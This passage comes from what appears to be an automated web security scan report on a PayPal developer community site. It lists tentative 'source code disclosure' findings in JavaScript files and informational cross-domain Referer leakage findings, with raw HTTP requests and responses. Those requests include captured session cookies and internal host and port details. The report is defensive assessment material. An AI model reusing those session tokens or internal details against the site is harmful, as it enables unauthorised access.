Confidence:   Tentative
Host:   https://www.x.com
Path:   /resources/scripts/gen/45658bd430e6cc0d6bfb5e49ad19ad72.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /resources/scripts/gen/45658bd430e6cc0d6bfb5e49ad19ad72.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/docs/DOC-1106
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c313130363b3130322c333831313b332c38383139383b332c3133383934323b332c38373839383b332c3134303532383b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:40:09 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 981912
JP: D=369 t=1313156410569291
Vary: User-Agent
Connection: close

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
<");if(c.substring(e,e+3)=="<?x"||c.substring(e,e+3)=="<?X"){var b=c.indexOf("?>");c=c.substring(b+2,c.length)}var e=c.indexOf("<!DOCTYPE");if(e!=-1){var b=c.indexOf(">
...[SNIP]...

5.4. https://www.x.com/resources/scripts/gen/5e8daa65eff08c12130590779b690338.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.x.com
Path:   /resources/scripts/gen/5e8daa65eff08c12130590779b690338.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /resources/scripts/gen/5e8daa65eff08c12130590779b690338.js HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/index.jspa
Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e27151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:59:26 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 648777
JP: D=18063 t=1313114366859700
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/*!
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02
...[SNIP]...
<");if(c.substring(e,e+3)=="<?x"||c.substring(e,e+3)=="<?X"){var b=c.indexOf("?>");c=c.substring(b+2,c.length)}var e=c.indexOf("<!DOCTYPE");if(e!=-1){var b=c.indexOf(">
...[SNIP]...

5.5. https://www.x.com/resources/scripts/gen/765a2586e97f57ed78f41f85e9e04f27.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.x.com
Path:   /resources/scripts/gen/765a2586e97f57ed78f41f85e9e04f27.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /resources/scripts/gen/765a2586e97f57ed78f41f85e9e04f27.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/people/BaldGeek
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:50 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 657477
JP: D=368 t=1313156330206991
Vary: User-Agent
Connection: close

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
<");if(c.substring(e,e+3)=="<?x"||c.substring(e,e+3)=="<?X"){var b=c.indexOf("?>");c=c.substring(b+2,c.length)}var e=c.indexOf("<!DOCTYPE");if(e!=-1){var b=c.indexOf(">
...[SNIP]...

5.6. https://www.x.com/resources/scripts/gen/912eca7a559d6800dd49c65b5a8a3f0d.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.x.com
Path:   /resources/scripts/gen/912eca7a559d6800dd49c65b5a8a3f0d.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /resources/scripts/gen/912eca7a559d6800dd49c65b5a8a3f0d.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/community/xcommerce-blogs?view=blog
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:43 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Vary: User-Agent
Content-Type: text/javascript
JP: D=43847 t=1313156323842940
Connection: close

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
<");if(c.substring(e,e+3)=="<?x"||c.substring(e,e+3)=="<?X"){var b=c.indexOf("?>");c=c.substring(b+2,c.length)}var e=c.indexOf("<!DOCTYPE");if(e!=-1){var b=c.indexOf(">
...[SNIP]...

5.7. https://www.x.com/themes/paypal/js/custom.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.x.com
Path:   /themes/paypal/js/custom.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /themes/paypal/js/custom.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/community/ppx/ec
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7238D44EFB679CF81CE553C3866BE5EA.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 01:59:40 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 31770
JP: D=418 t=1313114381172952
Vary: User-Agent
Connection: close

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.dill
...[SNIP]...
eturn p}('t K={16:\'K\',1L:G,1M:G,1d:G,2f:y(){u(D.2g!=8&&D.1N&&!D.1N[q.16]){q.1L=M;q.1M=M}17 u(D.2g==8){q.1d=M}},2h:D.2i,1O:[],1b:{},2j:y(){u(q.1L||q.1M){D.1N.2L(q.16,\'2M:2N-2O-2P:x\')}u(q.1d){D.2Q(\'<?2R 2S="\'+q.16+\'" 2T="#1P#2k" ?>\')}},2l:y(){t a=D.1k(\'z\');D.2m.1w.1Q(a,D.2m.1w.1w);u(a.12){2n{t b=a.12;b.1x(q.16+\'\\\\:*\',\'{1l:2U(#1P#2k)}\');q.12=b}2o(2p){}}17{q.12=a}},1x:y(a,b,c){u(1R b==\'1S\'||b===2V){b=0}u(b.2W.2q().1y(\'
...[SNIP]...

6. Cross-domain Referer leakage  previous  next
There are 31 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


6.1. https://www.x.com/community/feeds  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/feeds

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/feeds?community=2276 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=43069 t=1313157093427123
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.2. https://www.x.com/community/ppx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx?view=overview HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323135343b31342c323131353b31342c323232363b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:25 GMT; Path=/
Vary: User-Agent
JP: D=86319 t=1313157084962149
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.3. https://www.x.com/community/ppx/button_manager  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/button_manager

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/button_manager?view=overview HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323031343b31342c323031313b31342c323030393b31342c323030383b31342c323031303b31342c323031393b31342c323237363b31342c323237303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:34 GMT; Path=/
Vary: User-Agent
JP: D=279170 t=1313157034442237
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>Test your integration using the <a href="https://developer.paypal.com/" title="PayPal Sandbox">PayPal Sandbox</a>
...[SNIP]...
<p>The standard rate for receiving payments for goods and services is 2.9%. For details, see PayPal's standard <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_display-fees-outside" title="fee structure">fee structure</a>
...[SNIP]...
<p>If your sales volume exceeds USD $3,000.00/month, your rate can be as low as 1.9%. For details, see <a href="https://merchant.paypal.com/us/cgi-bin/marketingweb?cmd=_render-content&amp;content_ID=merchant/home" title="PayPal Merchant Services">PayPal Merchant Services</a>
...[SNIP]...
<p>If your transactions typically average less than $10.00, you could save money with our "5% plus 5.." rate. For information, see <a href="https://micropayments.paypal-labs.com/" title="Micropayments">Micropayments</a>
...[SNIP]...
nctional. You can hold multiple currency balances in your PayPal account or convert payments you receive at competitive rates. Currency conversion and cross-border fees may apply. For information, see <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_display-xborder-fees-outside&amp;countries=" title="Transaction Fees for Cross-border Payments">Transaction Fees for Cross-border Payments</a>
...[SNIP]...
<p>For answers to frequent questions, go to our <a href="https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help" title="Help Center">Help Center</a>
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.4. https://www.x.com/community/ppx/dev-tools  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/dev-tools

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/dev-tools?view=test1 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030333b31342c323031343b31342c323030383b31342c323030393b31342c323031303b31342c323031393b31342c323237363b31342c323237303b31342c323030353b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:34 GMT; Path=/
Vary: User-Agent
JP: D=111454 t=1313157033966642
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.5. https://www.x.com/community/ppx/developer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/developer

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/developer?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323131353b31342c323030323b31342c323232363b31342c323135343b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:24 GMT; Path=/
Vary: User-Agent
JP: D=156635 t=1313157084184224
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.6. https://www.x.com/community/ppx/ec  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/ec

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/ec?view=overview HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:31 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030383b31342c323237363b31342c323031393b31342c323237303b31342c323031303b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:32 GMT; Path=/
Vary: User-Agent
JP: D=142774 t=1313157032019351
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>Offer customers free <a href="https://www.paypal.com/ca/cgi-bin/webscr?cmd=xpt/Marketing_CommandDriven/general/PBPInfo-outside" title="PayPal Purchase Protection">PayPal Purchase Protection</a>
...[SNIP]...
<li>Take advantage of <a href="https://cms.paypal.com/ca/cgi-bin/marketingweb?cmd=_render-content&amp;content_ID=security/seller_protection#guides_for_safer_selling" title="PayPal Seller Protection">PayPal Seller Protection</a>
...[SNIP]...
<li>Modify your checkout flow to include <a href="https://www.paypal.com/express-checkout-buttons" title="PayPal Express Checkout buttons">PayPal Express Checkout buttons</a>
...[SNIP]...
<li>Test your integration using the <a href="https://developer.paypal.com/" title="PayPal Sandbox">PayPal Sandbox</a>
...[SNIP]...
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=#mrQuali" title="When your monthly sales exceed $3,000 and you've been a PayPal member more than 90 days, please fill out a one-time application, subject to approval.">Merchant rate qualification required</a>
...[SNIP]...
<p>If your transactions typically average less than $10.00, you could save money with our "5% plus 5.." rate. For information, see <a href="https://micropayments.paypal-labs.com/" title="Micropayments">Micropayments</a>
...[SNIP]...
<p>There are fees for currency conversion and to receive payments from another country. For details, see our standard <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_display-fees-outside" title="fee structure">fee structure</a>
...[SNIP]...
<li>Guess (<a href="https://www.paypalobjects.com/en_US/Marketing/pdf/PayPal_GUESS_CS_final.pdf" target="_blank" title="Guess (PDF)">PDF</a>)</li><li>GoDaddy (<a href="https://www.paypalobjects.com/en_US/pdf/godaddyCaseStudy.pdf" target="_blank" title="GoDaddy (PDF)">PDF</a>)</li><li>TigerDirect (<a href="https://www.paypalobjects.com/en_US/pdf/tigerdirectCaseStudy.pdf" target="_blank" title="TigerDirect (PDF)">PDF</a>)</li><li>OnlineShoes (<a href="https://www.paypalobjects.com/en_US/pdf/pp1350_online_com.pdf" target="_blank" title="OnlineShoes (PDF)">PDF</a>
...[SNIP]...
<p>For answers to frequent questions, go to our <a href="https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help" title="Help Center">Help Center</a>
...[SNIP]...
<li><a href="https://www.paypal-labs.com/integrationwizard/index.php" title="Express Checkout Integration Wizard">Express Checkout Integration Wizard</a>
...[SNIP]...
<li><a href="https://cms.paypal.com/cms_content/US/en_US/files/developer/PP_ExpressCheckout_IntegrationGuide.pdf" target="_blank" title="Express Checkout Integration Guide (PDF)">Express Checkout Integration Guide (PDF)</a>
...[SNIP]...
<li><a href="https://cms.paypal.com/cms_content/US/en_US/files/developer/PP_ExpressCheckout_IntegrationGuide_DG.pdf" target="_blank" title="Digital Goods Integration Guide - Express Checkout Edition (PDF)">Digital Goods Integration Guide - Express Checkout Edition (PDF)</a>
...[SNIP]...
<li><a href="https://cms.paypal.com/cms_content/US/en_US/files/developer/PP_ExpressCheckout_AdvancedFeaturesGuide.pdf" target="_blank" title="Express Checkout Advanced Features Guide (PDF)">Express Checkout Advanced Features Guide (PDF)</a>
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.7. https://www.x.com/community/ppx/global  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/global?view=overview HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030343b31342c323032353b31342c323131343b31342c323033343b31342c323032333b31342c323133333b31342c323032343b31342c323036333b31342c323036343b31342c323032323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:07 GMT; Path=/
Vary: User-Agent
JP: D=60503 t=1313157067602217
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<li>
           <a id="web_pagefooter_privacy" href="https://cms.paypal.com/cgi-bin/marketingweb?cmd=_render-content&content_ID=ua/Privacy_full&locale.x=en_US">
Privacy            </a>
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...
<noscript>
<img src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript" height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.8. https://www.x.com/community/ppx/showcase  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/showcase

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /community/ppx/showcase?view=overview HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
